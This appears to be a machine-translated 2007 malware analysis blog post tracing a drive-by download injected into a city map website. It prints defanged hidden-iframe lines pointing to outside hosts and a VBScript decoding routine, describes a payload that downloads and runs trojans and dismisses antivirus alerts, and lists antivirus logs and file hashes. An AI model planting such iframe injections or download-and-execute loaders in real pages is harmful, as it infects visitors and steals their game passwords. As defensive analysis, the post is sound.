EndurerOriginal
1Version
On the page of the city map website, rising warned:Hack. Exploit. VML. g.
Check the webpage and find that the images/Ad. js referenced by the webpage contains the Code:
/---
Document. writeln ("<IFRAME src =/" hxxp: // M ***. K *** is ** 163.com//index.html? Id = 5/"width = 0 Height = 0> <// IFRAME> ");
---/
Hxxp: // M ***. K *** is * 163.com/index.html? Id = 5Code included:
/---
<IFRAME src = "hxxp: // web ***. 7 *** 72 *** 6.com/%0%%%%%%%.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/
Hxxp: // web ***. 7 *** 72*7 *** 6.com/%0%%%%%%.htmThe title is HTTP no found and the content is VBScript code. The function is to call a custom function:
/----
Function rechange (k)
S = Split (k ,",")
T = ""
For I = 0 to ubound (s)
T = T + CHR (eval (S (I )))
Next
Rechange = T
End Function
----/
Decrypts the value of variable t and calls execute () for execution.
The decrypted code is VBScript code, which is used by Microsoft. XMLHTTP and SCR accept pting. fileSystemObject downloads the file 0.exeand saves it as % Temp %/svchost.exe and % Temp %/SVCHOST. vbs, and use shell. use the ShellExecute method of the Application Object Q.
File description:D:/test/0.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:33:14
Modification time: 12:33:14
Access time: 12:34:20
Size: 93240 bytes, 91.56 KB
MD5: ef70da-91d050cc898319acbb044e847
Kaspersky reportsWorm. win32.viking. II
After 0.exe is run, other malicious files will be downloaded and the EXE file will be infected.
The following is a record of Kaspersky 6 after 0.exe is run:
/----
Detected: Risk SoftwareTrojan. GenericRunning process: D:/test/0.exe
Detected: Trojan programTrojan-PSW.Win32.Magania.jmFile: C:/winnt/system32/wincab. sys
Detected: Trojan programTrojan-PSW.Win32.OnLineGames.esFile: C:/winnt/SMSs. exe
Detected risk software invader running process: C:/winnt/SVCHOST. exe
Detected: Risk software Invader (loader) running process: C:/winnt/assumer.exe
Detected: Trojan programBackdoor. win32.agent. ALHFile: C:/winnt/system32/systemt.exe/upack
Detected: Trojan programTrojan-PSW.Win32.OnLineGames.gsFile: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/atkzudi5/smsss00001cmd.exe
Detected: Trojan programTrojan. win32.agent. abfFile: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/276 batuz/lsasss1_12.16.exe/pe_patch/upack
Detected: Trojan trOjan-PSW.Win32.OnLineGames.esFile: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/cx67wl2n/avg00001cmd.exe
Detected: Trojan programTrojan-PSW.Win32.OnLineGames.esFile: C:/winnt/csrss.exe
Detected: Trojan programTrojan-PSW.Win32.OnLineGames.esFile: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/mut33wp4/datsc1_1cmd.exe
Detected: Trojan programTrojan-Downloader.Win32.Small.czlFile: C:/winnt/10sy.exe
Detected: Trojan program troJan-PSW.Win32.WOW.ecFile: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/o56r812f/adobesvc1_12.16.exe
Detected: Trojan programTrojan-PSW.Win32.OnLineGames.esFile: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/e1itg5sv/svchots00001cmd.exe
Detected: Trojan programTrojan-Downloader.Win32.Small.czlFile: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/9 ulfumaw/mstcs1_1cmd.exe
----/
It is worth noting that the virus will search for the Kaspersky warning window titled AVP. alertdialog and simulate clicking "allow" and "Skip"
Send the wm_close message to the notification window (Class Name: AVP. product_notification) of Kaspersky to end the window.
Therefore, you cannot perform operations.
Pe_xscan is used to scan and suspicious items are found:
/---
Pe_xscan by Purple endurer
2007-3-5 12:44:24
Windows 2000 Service Pack 4 (5.0.2195)
Administrator user group
[System process] * 0
C:/winnt/system32/wsttrs. dll | 12:37:47, 2007-3-5
C:/winnt/explorer. EXE * 928 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.3700.6690 | Windows Explorer | copyright (c) Microsoft Corp. 1981-1999 | 5.00.3700.6690 | Microsoft Corporation |? | Explorer | EXPLORER. EXE
C:/winnt/richdll. dll | 12:37:41
C:/winnt/system32/wsttrs. dll | 12:37:47
C:/winnt/system32/internat.exe * 1176 | 2000-1-10 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.2900000000 | keyboard language indicator applet | copyright (c) Microsoft Corp. 1994-1999 | 5.00.2900000000 | Microsoft Corporation |? | Internat. exe
C:/winnt/system32/wsttrs. dll | 12:37:47, 2007-3-5
D:/program files/Tencent/QQ/qq.exe * 516 | 8:52:30 | Tencent QQ | 0, 0, 0, 0 | QQ | copyright? 2005 | 0, 0, 0, 0 | Tencent | comqqd | qq.exe
C:/winnt/system32/wsttrs. dll | 12:37:47, 2007-3-5
D:/program files/Maxthon/maxthon.exe * 904 | Maxthon application | 1, 5, 9, 80 | Maxthon Web browser | copyright (c) 2002 | 1, 5, 9, 80 | Maxthon International Ltd. | Maxthon. EXE
C:/winnt/system32/wsttrs. dll | 12:37:47, 2007-3-5
D:/program files/editplus 2/editplus.exe * 588 | 9:32:12 | editplus | 2, 2, 1,330 | editplus | copyright? 1998-2005 es-computing | 2, 2, 1,330 | es-computing | editplus. exe
C:/winnt/system32/wsttrs. dll | 12:37:47
C:/winnt/system32/notepad.exe * 508 | 2000-1-10 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.2140.1 | notepad | copyright (c) Microsoft Corp. 1981-1999 | 5.00.2140.1 | Microsoft Corporation |? | Notepad. exe
C:/winnt/system32/wsttrs. dll | 12:37:47, 2007-3-5
C:/winnt/system32/conime.exe * 1476 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.2195.6655 | console IME | copyright (c) Microsoft Corp. 1981-1999 | 5.00.2195.6655 | Microsoft Corporation |? | Console | conime. exe
C:/winnt/system32/wsttrs. dll | 12:37:47, 2007-3-5
D:/PE/tools/3.exe * 1508 | 12:43:37
C:/winnt/system32/wsttrs. dll | 12:37:47, 2007-3-5
O4-HKLM/../run: [wsttrs] C:/winnt/SVCHOST. exe
O23-service: Shiji (Shiji)-C:/winnt/system32/wincab. sys (manually started)
---/
File description:C:/winnt/system32/wsttrs. dll
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:37:47
Modification time: 12:37:47
Access time: 13:35:18
Size: 23539 bytes, 22.1011 KB
MD5: 6e25ea101a59463623725d6073058dc1
Kaspersky reports:Trojan-PSW.Win32.Magania.jm.1
Rising news:Trojan. psw. wlonline. JCV
File description:C:/winnt/richdll. dll
Attribute :----
An error occurred while obtaining the file version information!
Creation Time: 12:37:41
Modification time: 12:37:41
Access time: 13:38:25
Size: 29721 bytes, 29.25 KB
MD5: a936b1dba52bbbc79cf23f9d965d2646
Kaspersky reports:Worm. win32.viking. II
File description:C:/winnt/SVCHOST. exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:37:46
Modification time: 12:37:46
Access time:
Size: 69859 bytes, 68.227 KB
MD5: 2424f02a0ea72ffeae27f8b33fb5dfc9
Kaspersky reports:Trojan-PSW.Win32.Magania.jm.1
Rising news:Trojan. psw. Roc. ad
File description:C:/winnt/10sy.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:38:15
Modification time: 13:47:44
Access time: 13:49:17
Size: 25072 bytes, 24.496 KB
MD5: 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky reports:Trojan-Downloader.Win32.Small.czl
Rising news:Trojan. psw. lmir. MDW
File description:C:/winnt/system32/systemt.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:37:56
Modification time: 12:59:27
Access time:
Size: 26130 bytes, 25.530 KB
MD5: 8ae1afdb6a25da-a5d55a4eb5389121c
Kaspersky reports:Backdoor. win32.agent. ALH
File description:C:/Documents and Settings/PE/Local Settings/temp/q9xtwt5. dll
Property: ash-
An error occurred while obtaining the file version information!
Creation Time: 12:37:46
Modification time: 12:37:46
Access time:
Size: 32483 bytes, 31.739 KB
MD5: b19d0273f424ed7e3dc4fb95a70f48a4
Kaspersky reports:Trojan-PSW.Win32.Magania.jm.1
Rising news:Rootkit. vanti. Vr
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/atkzudi5/Web [1]. dll
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 13:27:43
Size: 17227 bytes, 16.843 KB
MD5: c68f384f846fc5943e8470ff37d9111d
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/atkzudi5/smsss00001cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:37:57
Modification time: 12:37:59
Access time: 13:25:55
Size: 13824 bytes, 13.512 KB
MD5: 3f864049a2fde64042a82565d4ff92af
Kaspersky reports:Trojan-PSW.Win32.OnLineGames.gs
Rising news:Trojan. psw. zhengtu. ANC
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/276 batuz/lsasss1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 13:23:29
Size: 40968 bytes, 40.8 KB
MD5: 23f203134804fa6f2dda-67267595dc5
Kaspersky reports:Trojan. win32.agent. abf
Rising news ::Trojan. Agent. fii
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/cx67wl2n/avg1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:37:43
Modification time:
Access time: 13:21:48
Size: 13824 bytes, 13.512 KB
MD5: 3cec40cb6a2ba1e57c91a083c10b09e4
This file will be copied:C:/winnt/SMSs. exe
Kaspersky reports:Trojan-PSW.Win32.OnLineGames.es
Rising news:Trojan. psw. OnlineGames. In
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/mut33wp4/datsc1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:38:10
Modification time: 12:38:10
Access time: 13:17:19
Size: 13824 bytes, 13.512 KB
MD5: a9b8b545f24b36e52fd0176db42becdd
Kaspersky reports:Trojan-PSW.Win32.OnLineGames.es
Rising news ::Trojan. psw. Agent. jdm
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/o56r812f/adobesvc1_12.16.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:38:25
Modification time: 13:38:28
Access time: 13:15:18
Size: 226868 bytes, 221.564 KB
MD5: 54ce2ffabb6ddefd26d5360d427870c2
Kaspersky reports:Trojan-PSW.Win32.WOW.ec
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/e1itg5sv/svchots00001cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time: 12:38:32
Access time: 13:13:13
Size: 14848 bytes, 14.512 KB
MD5: a4721319bf2f16aed92fdc8623ad0623
This file is copied:C:/winnt/csrss.exe
Kaspersky reports:Trojan-PSW.Win32.OnLineGames.es
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/9 ulfumaw/inetinf1_1).exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:37:49
Modification time: 12:37:55
Access time:
Size: 279652 bytes, 273.100 KB
MD5: 10a390602afad9926028417607ac094a
This file is copiedC:/winnt/services. exe
Kaspersky reports:Backdoor. win32.agent. ALH
File description:C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content. ie5/9 ulfumaw/mstcs1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:38:14
Modification time:
Access time: 13:10:36
Size: 25072 bytes, 24.496 KB
MD5: 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky reports:Trojan-Downloader.Win32.Small.czl
Rising news:Trojan. psw. lmir. MDW
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
